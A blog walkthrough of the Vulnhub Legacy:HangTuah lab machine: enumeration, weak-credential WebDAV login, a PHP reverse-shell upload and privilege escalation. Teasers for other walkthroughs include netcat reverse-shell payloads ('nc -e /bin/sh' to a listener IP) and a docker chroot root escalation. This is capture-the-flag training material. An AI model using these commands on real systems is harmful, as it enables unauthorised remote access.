Legacy:HangTuah - Walkthrough [Vulnhub]

Here's my solution for Legacy:HangTuah.
The machine can be downloaded from here.

Nmap
Scanning for all TCP ports.
$ nmap -sC -sV -p- 192.168.1.109


We find 3 ports open.

Enumeration
From the nmap's output we see that ftp on port 777 allows for anonymous login, lets check it out.
$ nmap 192.168.1.109 777
Name: anonymous
Password: anonymous


We find a file named as notes.txt, under the hidden directory- .secret

No any hints/useful information yet.

Using gobuster to scan for directories.
$ gobuster -u http://192.168.1.109/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Browsing /robots.txt

We map the ip to host name by editing the /etc/hosts file.

Lets browse the web.



While scanning for directories using gobuster, we find a text file- admin.txt
The file says- we are admin. Maybe a hint for user name.


We enumerate subdomains using wfuzz.
$ wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.legacyhangtuah.com" --hw 968 legacyhangtuah.com

We find one. So, in order to access this subdomain we need to make an entry of the host name in the /etc/hosts file.


Browsing the subdomain.

Checking the source of the page, no hints. Lets scan for directories.
$ dirb http://door.legacyhangtuah.com/ -r

A /webdav directory, as we browse this directory it asks for credential.

Previously while enumerating, we found a file named- admin.txt, which gave us the hint for the user name as- admin, we try entering the password as- admin.
And yes, its correct. 


Now we upload the php reverse shell file.
$ cadaver http://door.legacyhangtuah.com/webdav
Username: admin
Password: admin



Getting Access
Now to run this file we need to browse the location of our php reverse shell file or we simply refresh the page, enter the credential again and click on the payload file.

On the other hand we start the netcat listener.


 

We successfully get the reverse shell.

Privilege Escalation
From www-data>pendekar.
We find a hidden file- .bash_history, under the directory- /var/www which give us the hint for how the file can be manipulated for privilege escalation.




After reading the file- .bash_history, we navigate to directory- /opt/pendekar.
Within this directory we find 2 files- official_letter.txt and toyou.txt

We observe that whatever command we place in file- official_letter.txt, the output can be seen in file- send_letter.txt, which is located under the directory- /home/pendekar

We also observe that, we need to wait for 1-2 minutes to get the appropriate output, seems like a cron job is running in the background.

To escalate our privilege we enter the command/payload to get the ssh key for the user- pendekar( hint form the file- .bash_history).



We copy the private key and save it on our machine. Now before accessing the ssh we change the permission of the file.
$ chmod 600 key
$ ssh -i key pendekar@192.168.1.109

User Flag.

From pendekar>hangtuah.
We find a hint in a file- lastnotes.txt located under /home/hangtuah.



Looks like the hint is encoded in morse code. We can browse CyberChef to decode it.



To note is- permission already and key.
We already have a private key of user pendekar lets try to access another user- hangtuah with the same private key.
$ ssh -i key hangtuah@192.168.1.109


From hangtuah>root.
We check for SUDO rights.

Lets escalate and get the root flag.




 






Comments

Post a Comment

Popular posts from this blog

Sunset:Noontide - Walkthrough [Vulnhub]

Image
Here's my solution for Sunset:Noontide. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.109 We find 3 ports (UnrealIRCd) open. Enumeration We search the exploit for UnrealIRCd and we find it here.     Getting Access To exploit we simply run the nmap command with the reverse shell payload and on the other hand we start the netcat listener. $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -e /bin/sh 192.168.1.108 1234' 192.168.1.109 We get the reverse shell. User Flag. Privilege Escalation We find that user- root has the default password- root. Lets switch to user- root and get the root flag. $ su root Password: root  
Read more

CyberSploit:2 - Walkthrough [Vulnhub]

Image
Here's my solution for CyberSploit:2. The Machine can be downloaded from here Nmap Starting with nmap scanning for all TCP open ports. nmap -sC -sV -p- 192.168.1.103 We find only 2 open ports. Enumeration Browsing the website, show list of usernames and passwords. Checking the source code reveal us a hint- ROT47. While browsing the website, we see a strange username- D92:=6?5C2 and its associated password as- 4J36CDA=@:E` From the hint we can guess that the username and password can be ROT47 encoded. Browsed Decode.fr to decode it, and we get the credentials as- username: shailendra password: cybersploit1 Getting Access Tried ssh with credential, and we get the access. ssh shailendra@192.168.1.1 password: cybersploit1 Found a file named as hint.txt, which gives a hint as docker, it can be used for privilege escalation, also the user is a member of docker group. Privilege Escalation docker run -v /:/mnt --rm -it alpine chroot /mnt sh And we get the flag
Read more

BBS(cute):1.0.1 - Walkthrough [Vulnhub]

Image
Here's my solution for BBS(cute):1.0.1. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.111 We find 5 ports open. Enumeration Browsing the web hosted on port 80 (Default HTTP Port). We do not find any useful information lets run the dirb for scanning directories. $ dirb http://192.168.1.111 -r Browsing /index.php We see that it is built on CMS- CuteNews and its version 2.1.2 We search for the exploit and found it here.   Lets get this exploit. Getting Access But before running the exploit we need to make some changes. We remove all /CuteNews from the exploit code, in order to run it successfully. Done with the changes, now we run the exploit. $ python3 48800.py We provide the required information that is, the URL and hit enter. The commands are running fine, but we are not able to navigate to different directories, hence we try to get the normal reverse shell. We see netcat is present, we enter the payload. $ nc -e /bin/bash 19...
Read more